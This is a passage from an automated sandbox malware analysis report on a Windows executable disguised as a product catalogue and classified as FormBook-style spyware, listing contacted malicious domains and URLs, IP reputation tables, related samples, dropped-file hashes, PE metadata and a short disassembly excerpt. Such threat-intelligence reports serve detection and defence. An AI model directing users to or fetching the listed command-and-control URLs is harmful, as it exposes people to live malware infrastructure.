                                                                              unknown
                                                                              https://dts.gnpge.combrfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003368000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                                                              https://duckduckgo.com/ac/?q=find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icofind.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://www.ecosia.org/newtab/find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://ac.ecosia.org/autocomplete?q=find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              http://www.dealsbyaustin.online/sk-logabpstatus.php?a=MHNwU0hTS3RqT2gyb1JWNnZ0TlVFQXdJS2lOOENZeUI2UHfind.exe, 00000006.00000002.4192942372.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003368000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://aed.shopping/v90x/?FJiPC=SV8zM0DpGKPq5vcKLjD0JfM0MkEh6YkwwbH6C33UC6CYdO1WGea88eauSogomnSMda8dfind.exe, 00000006.00000002.4192942372.00000000052FA000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.000000000418A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referfind.exe, 00000006.00000002.4192942372.0000000005168000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003FF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfind.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&FJiPC=d5find.exe, 00000006.00000002.4192942372.00000000041B4000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003044000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001E2B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://www.sdfhfgoool10.lifebrfQTUZMGd.exe, 00000007.00000002.4191938504.0000000000D6A000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://www.dealsbyaustin.online/px.js?ch=1find.exe, 00000006.00000002.4192942372.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003368000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.dealsbyaustin.online/px.js?ch=2find.exe, 00000006.00000002.4192942372.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003368000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=find.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://www.sailforever.xyz/uahh/?2FO=QBbT1R8&amp;FJiPC=d5find.exe, 00000006.00000002.4192942372.00000000041B4000.00000004.10000000.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000002.4192554567.0000000003044000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2482846125.000000001E2B4000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              • No. of IPs < 25%
                                                                                              • 25% < No. of IPs < 50%
                                                                                              • 50% < No. of IPs < 75%
                                                                                              • 75% < No. of IPs
                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                              103.106.67.112
                                                                                              www.sailforever.xyzNew Zealand
                                                                                              56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                                              68.65.122.222
                                                                                              osi.gardenUnited States
                                                                                              22612NAMECHEAP-NETUSfalse
                                                                                              184.94.215.26
                                                                                              www.hellosmall.infoUnited States
                                                                                              394896VXCHNGE-NC01USfalse
                                                                                              34.251.91.168
                                                                                              home.portfolioboxdns.comUnited States
                                                                                              16509AMAZON-02USfalse
                                                                                              156.227.17.86
                                                                                              www.my1pgz.proSeychelles
                                                                                              40065CNSERVERSUSfalse
                                                                                              185.121.178.197
                                                                                              jiq19281.jisuw-cdn.jiasula.vipIceland
                                                                                              138995BILLY-AS-APAntboxNetworkCNfalse
                                                                                              104.21.48.76
                                                                                              www.hcpf.xyzUnited States
                                                                                              13335CLOUDFLARENETUStrue
                                                                                              208.91.197.27
                                                                                              www.dealsbyaustin.onlineVirgin Islands (BRITISH)
                                                                                              40034CONFLUENCE-NETWORK-INCVGfalse
                                                                                              84.32.84.32
                                                                                              luxurylive.xyzLithuania
                                                                                              33922NTT-LT-ASLTtrue
                                                                                              85.159.66.93
                                                                                              natroredirect.natrocdn.comTurkey
                                                                                              34619CIZGITRfalse
                                                                                              3.33.130.190
                                                                                              sdfhfgoool10.lifeUnited States
                                                                                              8987AMAZONEXPANSIONGBfalse
                                                                                              35.214.185.243
                                                                                              www.aed.shoppingUnited States
                                                                                              19527GOOGLE-2USfalse
                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                              Analysis ID:1528626
                                                                                              Start date and time:2024-10-08 05:26:08 +02:00
                                                                                              Joe Sandbox product:CloudBasic
                                                                                              Overall analysis duration:0h 10m 19s
                                                                                              Hypervisor based Inspection enabled:false
                                                                                              Report type:full
                                                                                              Cookbook file name:default.jbs
                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                              Number of analysed new started processes analysed:8
                                                                                              Number of new started drivers analysed:0
                                                                                              Number of existing processes analysed:0
                                                                                              Number of existing drivers analysed:0
                                                                                              Number of injected processes analysed:2
                                                                                              Technologies:
                                                                                              • HCA enabled
                                                                                              • EGA enabled
                                                                                              • AMSI enabled
                                                                                              Analysis Mode:default
                                                                                              Analysis stop reason:Timeout
                                                                                              Sample name:Products Order Catalogs20242.exe
                                                                                              Detection:MAL
                                                                                              Classification:mal100.troj.spyw.evad.winEXE@7/2@15/12
                                                                                              EGA Information:
                                                                                              • Successful, ratio: 75%
                                                                                              HCA Information:
                                                                                              • Successful, ratio: 96%
                                                                                              • Number of executed functions: 42
                                                                                              • Number of non-executed functions: 312
                                                                                              Cookbook Comments:
                                                                                              • Found application associated with file extension: .exe
                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                              • Execution Graph export aborted for target brfQTUZMGd.exe, PID 5592 because it is empty
                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                              TimeTypeDescription
                                                                                              23:28:28API Interceptor11963483x Sleep call for process: find.exe modified
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              184.94.215.26Pending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.guplace.xyz/s0g5/
                                                                                              SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.tribevas.online/io0i/
                                                                                              34.251.91.168doc_1000302040152023.vbsGet hashmaliciousFormBookBrowse
                                                                                              • www.miajazzdavy.com/c9ug/?sT2l4b=1bqhCn&6lp=XEdRzQWroRUI8aKRVCoyoN7ITwqbWy4dOVFdGH1LpWMWLHKgU3zM8cNqCrXC81rMr8oh
                                                                                              http://www.urztr.comGet hashmaliciousUnknownBrowse
                                                                                              • www.urztr.com/
                                                                                              5A8HUqi3L2.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.giovannilugo.net/zzun/?kJ=gDbBkOw4HYW2AoVJ1VWfYLEqjstAHGEUPRtUX9i63N8V/ubL4oBE034If8CCzW7JtgZP&UP=OVpl4xvHSPI8wb
                                                                                              DHL_Shipping Documents_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.giovannilugo.net/cloo/?-ZU8-t=-ZgHER&4h=5mXl4r1Njaz2G8tg45fY/80c0pix8MDbGJyJiquMuVZoHuGj7AsLLB64SHrb8Jfoh8T+
                                                                                              DHL HAWB.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.desartas.com/uite/?5jcLjRc=2zP3MP1YeV2mtSf3DNBtPknntaXWN+TzxM5VbN1vXebCdstMAOWnhfxH82P2jCU70RfR&t8k=-ZsDp66pcv3lmxA0
                                                                                              156.227.17.86rpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • www.my1pgz.pro/4db5/
                                                                                              208.91.197.27Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.crochetpets.online/6s8n/
                                                                                              Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.martaschrimpf.info/7kkb/
                                                                                              Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.martaschrimpf.info/7kkb/
                                                                                              Product Data Specifications_PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kevin-torkelson.info/gekb/?Z0=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWA67inr6j8yvx+6PXqz9iyZ5+RA70tZ4RmMUT5lyJ2S3VdPbvKQVdTVJ&fRr0=tfAptZ
                                                                                              PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.brainchainllc.online/x7gn/
                                                                                              QlHhDu2uh1.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.kevin-torkelson.info/gekb/?vlJ0J=5z2j4JvjBCmnxDGlKBgzTD3+HUD/dd2fumCOi9/ZiiqSem4bSPmiTeLNTUQRFOSACWspsHfkjQi2G8tl0kaRWHr5s1DFjeSN2u6PXpPjiBw39CM7/tZ+YHIUNMByc2S3D5vP9Ng=&HDJP=Pnl8G6jPyrn
                                                                                              Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.inastra.online/55bv/
                                                                                              AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.palcoconnector.net/c45k/
                                                                                              RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.yourhomecopilot.online/jdoy/
                                                                                              LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                              • www.willtriallawyers.net/ccld/
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              www.aed.shoppingNEW INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                              • 35.214.185.243
                                                                                              home.portfolioboxdns.comdoc_1000302040152023.vbsGet hashmaliciousFormBookBrowse
                                                                                              • 34.251.91.168
                                                                                              http://www.urztr.comGet hashmaliciousUnknownBrowse
                                                                                              • 34.251.91.168
                                                                                              Shipping_documents.exeGet hashmaliciousAsyncRAT, FormBookBrowse
                                                                                              • 52.214.224.110
                                                                                              SEGU9670620.exeGet hashmaliciousFormBookBrowse
                                                                                              • 52.213.55.157
                                                                                              vbc (2).exe.exeGet hashmaliciousFormBookBrowse
                                                                                              • 52.214.224.110
                                                                                              5A8HUqi3L2.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.251.91.168
                                                                                              DHL_Shipping Documents_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 34.251.91.168
                                                                                              PO_05964_pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 52.214.224.110
                                                                                              two_months_salary_reciept.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 52.213.55.157
                                                                                              DHL HAWB.exeGet hashmaliciousFormBookBrowse
                                                                                              • 34.251.91.168
                                                                                              natroredirect.natrocdn.comrpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 85.159.66.93
                                                                                              DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              ORIGINAL INVOICE COAU7230734298.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              RN# D7521-RN-00353 REV-2.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              CITA#U00c7#U00c3O.exeGet hashmaliciousFormBookBrowse
                                                                                              • 85.159.66.93
                                                                                              www.my1pgz.prorpedido-002297.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 156.227.17.86
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              AMAZON-02USfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.120
                                                                                              rfc[1].htmlGet hashmaliciousUnknownBrowse
                                                                                              • 18.238.55.20
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.23
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.23
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.48
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 18.245.162.100
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.48
                                                                                              http://pay.christinagstewart.com/Get hashmaliciousUnknownBrowse
                                                                                              • 18.245.86.11
                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                              • 52.222.236.23
                                                                                              https://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                                              • 108.138.7.53
                                                                                              VXCHNGE-NC01USPending invoices.exeGet hashmaliciousFormBookBrowse
                                                                                              • 184.94.215.26
                                                                                              SOA SIL TL382920.exeGet hashmaliciousFormBookBrowse
                                                                                              • 184.94.215.26
                                                                                              https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=https://www.google.com/url?q=3HOSozuuQiApLjODz3yh&rct=tTPSJ3J3wDs09VcyycT&sa=t&esrc=s09VcFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJC1GniFlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fanoboy.pw%2Fojo%2Flok%2F4905038053/#bGVvbi5sYXZpbkB5b2RlbC5jby51aw===$%E3%80%82Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                              • 184.94.212.131
                                                                                              FATURALAR PDF.exeGet hashmaliciousFormBookBrowse
                                                                                              • 184.94.212.115
                                                                                              FirstfedwebInv27-1486.htmlGet hashmaliciousBlackHacker JS ObfuscatorBrowse
                                                                                              • 130.250.191.5
                                                                                              https://lookerstudio.google.com/s/mPdl62g0mi8Get hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                              • 184.94.212.131
                                                                                              DHL airwaybill # 6913321715 & BL Draft copy.exeGet hashmaliciousFormBookBrowse
                                                                                              • 184.94.212.115
                                                                                              https://buysuhagra.shop/ePFcjxsxGet hashmaliciousHTMLPhisherBrowse
                                                                                              • 184.94.212.117
                                                                                              INVCherokeebrick.htmlGet hashmaliciousUnknownBrowse
                                                                                              • 130.250.191.5
                                                                                              Stacey Opted PYMT Tokyo electron limited.docxGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                              • 184.94.212.131
                                                                                              NAMECHEAP-NETUSIRYzGMMbSw.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.213.249.216
                                                                                              Arrival Notice.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.0.238.238
                                                                                              Arrival notice.exeGet hashmaliciousFormBookBrowse
                                                                                              • 162.0.238.246
                                                                                              http://buddycities.com/Get hashmaliciousUnknownBrowse
                                                                                              • 162.255.119.35
                                                                                              http://buckboosters.com/Get hashmaliciousUnknownBrowse
                                                                                              • 192.64.119.229
                                                                                              http://vpnpanda.org/Get hashmaliciousUnknownBrowse
                                                                                              • 162.255.119.66
                                                                                              172823964570053a59b24ac6432eba9d1852681850b7ea6d06bd275c12bfed591157d7099b818.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              • 198.54.117.242
                                                                                              http://nirothniroth.site/?p=22&fbclid=IwY2xjawFs_DdleHRuA2FlbQIxMQABHTdgZU6ok722L5RxKPR-zh7Gkm6BqZ8BcT950y1bxf6l0LKz0zslg7KJHw_aem__ldVm1UUndXAkwYRakjBzgGet hashmaliciousUnknownBrowse
                                                                                              • 63.250.43.7
                                                                                              http://reportrix.co.uk/assets/assetfile/js/main.jsGet hashmaliciousUnknownBrowse
                                                                                              • 104.219.248.24
                                                                                              presupuesto urgente.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 199.192.19.19
                                                                                              VOYAGERNET-AS-APVoyagerInternetLtdNZ0wG3Y7nLHa.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              • 111.65.234.232
                                                                                              i686.elfGet hashmaliciousUnknownBrowse
                                                                                              • 202.154.140.243
                                                                                              xd.x86.elfGet hashmaliciousMiraiBrowse
                                                                                              • 203.96.31.242
                                                                                              KKveTTgaAAsecNNaaaa.i686.elfGet hashmaliciousUnknownBrowse
                                                                                              • 103.146.201.21
                                                                                              kz7iLmqRuq.exeGet hashmaliciousQuasarBrowse
                                                                                              • 203.96.177.211
                                                                                              https://app.realcreator.co/preview/9fe9f3e5-8e52-4155-934b-225a56159ee0Get hashmaliciousUnknownBrowse
                                                                                              • 103.146.241.97
                                                                                              arm5-20240709-0417.elfGet hashmaliciousMiraiBrowse
                                                                                              • 114.23.243.29
                                                                                              rOrdinen_487685934GIANCARLOC_s_r_lconvulsional.batGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 103.106.67.129
                                                                                              IMG56758938583095883593858835Blindehjemmet.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                              • 103.106.67.129
                                                                                              mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                              • 114.23.243.60
                                                                                              No context
                                                                                              No context
                                                                                              Process:C:\Windows\SysWOW64\find.exe
                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                              Category:dropped
                                                                                              Size (bytes):114688
                                                                                              Entropy (8bit):0.9746603542602881
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                              Malicious:false
                                                                                              Reputation:high, very likely benign file
                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Users\user\Desktop\Products Order Catalogs20242.exe
                                                                                              File Type:data
                                                                                              Category:dropped
                                                                                              Size (bytes):287232
                                                                                              Entropy (8bit):7.995818321137186
                                                                                              Encrypted:true
                                                                                              SSDEEP:6144:RAQ7qK1pFLSLrWHtT6tY3mzoJ9HZNZdcftlfjQQe16igJ+LMA+tft+zch24B6:CQ+K/FLSPWHtet6L3snLQZwGgTtKc7B6
                                                                                              MD5:162CF7DEA2FB5051D998BD787DB8FB36
                                                                                              SHA1:5806FF066C407508284F36DFBAD060269795B217
                                                                                              SHA-256:E88B7820B221899C63F57E3B22504BEDCC5E34830F24780193B510A7682AE238
                                                                                              SHA-512:C85E40CAFE1C6B1007424D6A3B61FD31F3D8764E94D523991616025E356F20861F4D9E8F99307324592C9CEFA76947B35F13D8AA37635C74AFCC653810321C97
                                                                                              Malicious:false
                                                                                              Reputation:low
                                                                                              Preview:u..g.OUGC...1...n.SM...[_..8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST.HT5YP.IC.>...Vz.s.;'?y8D70F29.+5[9 !g!4.*M!w_\r...l4'R=y9^^.HT5WOUG:P>../0..2,.s,>.,...i4_.N...i'$.-...kVU..:-$d(Q.W4ST8HT5..UG.P6XR..n2RKSNLYH.XU5XU3HTeSOUGCQ7X8O.%2RKCNLY(2XW4.T8XT5WMUGEQ7X8OW64RKSNLYH68S4SV8HT5WOWG..7X(OW&2RKS^LYX6XW4ST(HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X.;2NFRKS..]H6HW4S.<HT%WOUGCQ7X8OW62RkSN,YH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ7X8OW62RKSNLYH6XW4ST8HT5WOUGCQ
                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                              Entropy (8bit):7.509622314775648
                                                                                              TrID:
                                                                                              • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                              • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                              File name:Products Order Catalogs20242.exe
                                                                                              File size:1'323'139 bytes
                                                                                              MD5:9835b14881b3b27767cdda4fafdb3506
                                                                                              SHA1:b5d14918e92602ccc7439dd2ee6a0c076218b2a0
                                                                                              SHA256:9e4ebf3412a36099adf96f26ffc3265a7a5b9eefc5f1a0d87f10dbadf82474c1
                                                                                              SHA512:1f3420913adf2aec543d562bef3b391756b15dd5e500fc863f6e0cd997b74b32d7b73df7ae0f7dd32eca55ad26961982575a594f523598d38152ca77a79313b9
                                                                                              SSDEEP:24576:ffmMv6Ckr7Mny5QLP351EtxwGhTj4ZYLfgy:f3v+7/5QLPkxJoy
                                                                                              TLSH:B055F152B7D680B6DDA33971293BE326EB3575194333C5CB97E02E778E211409B3A362
                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........
                                                                                              Icon Hash:1733312925935517
                                                                                              Entrypoint:0x416310
                                                                                              Entrypoint Section:.text
                                                                                              Digitally signed:false
                                                                                              Imagebase:0x400000
                                                                                              Subsystem:windows gui
                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                              Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                              TLS Callbacks:
                                                                                              CLR (.Net) Version:
                                                                                              OS Version Major:5
                                                                                              OS Version Minor:0
                                                                                              File Version Major:5
                                                                                              File Version Minor:0
                                                                                              Subsystem Version Major:5
                                                                                              Subsystem Version Minor:0
                                                                                              Import Hash:aaaa8913c89c8aa4a5d93f06853894da
                                                                                              Instruction
                                                                                              call 00007FCB68628BCCh
                                                                                              jmp 00007FCB6861C99Eh
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              int3
                                                                                              push ebp
                                                                                              mov ebp, esp
                                                                                              push edi
                                                                                              push esi
                                                                                              mov esi, dword ptr [ebp+0Ch]
                                                                                              mov ecx, dword ptr [ebp+10h]
                                                                                              mov edi, dword ptr [ebp+08h]
                                                                                              mov eax, ecx
                                                                                              mov edx, ecx
                                                                                              add eax, esi
                                                                                              cmp edi, esi
                                                                                              jbe 00007FCB6861CB2Ah
                                                                                              cmp edi, eax
                                                                                              jc 00007FCB6861CCCAh
                                                                                              cmp ecx, 00000100h
                                                                                              jc 00007FCB6861CB41h
                                                                                              cmp dword ptr [004A94E0h], 00000000h
                                                                                              je 00007FCB6861CB38h
                                                                                              push edi
                                                                                              push esi
                                                                                              and edi, 0Fh
                                                                                              and esi, 0Fh
                                                                                              cmp edi, esi
                                                                                              pop esi
                                                                                              pop edi
                                                                                              jne 00007FCB6861CB2Ah
                                                                                              pop esi
                                                                                              pop edi
                                                                                              pop ebp
                                                                                              jmp 00007FCB6861CF8Ah
                                                                                              test edi, 00000003h
                                                                                              jne 00007FCB6861CB37h
                                                                                              shr ecx, 02h
                                                                                              and edx, 03h
                                                                                              cmp ecx, 08h
                                                                                              jc 00007FCB6861CB4Ch
                                                                                              rep movsd
                                                                                              jmp dword ptr [00416494h+edx*4]
                                                                                              nop
                                                                                              mov eax, edi
                                                                                              mov edx, 00000003h
                                                                                              sub ecx, 04h
                                                                                              jc 00007FCB6861CB2Eh
                                                                                              and eax, 03h
                                                                                              add ecx, eax
                                                                                              jmp dword ptr [004163A8h+eax*4]
                                                                                              jmp dword ptr [004164A4h+ecx*4]
                                                                                              nop
                                                                                              jmp dword ptr [00416428h+ecx*4]
                                                                                              nop
                                                                                              mov eax, E4004163h
                                                                                              arpl word ptr [ecx+00h], ax
                                                                                              or byte ptr [ecx+eax*2+00h], ah
                                                                                              and edx, ecx
                                                                                              mov al, byte ptr [esi]
                                                                                              mov byte ptr [edi], al
                                                                                              mov al, byte ptr [esi+01h]
                                                                                              mov byte ptr [edi+01h], al
                                                                                              mov al, byte ptr [esi+02h]
                                                                                              shr ecx, 02h
                                                                                              mov byte ptr [edi+02h], al
                                                                                              add esi, 03h
                                                                                              add edi, 03h
                                                                                              cmp ecx, 08h
                                                                                              jc 00007FCB6861CAEEh
                                                                                              Programming Language:
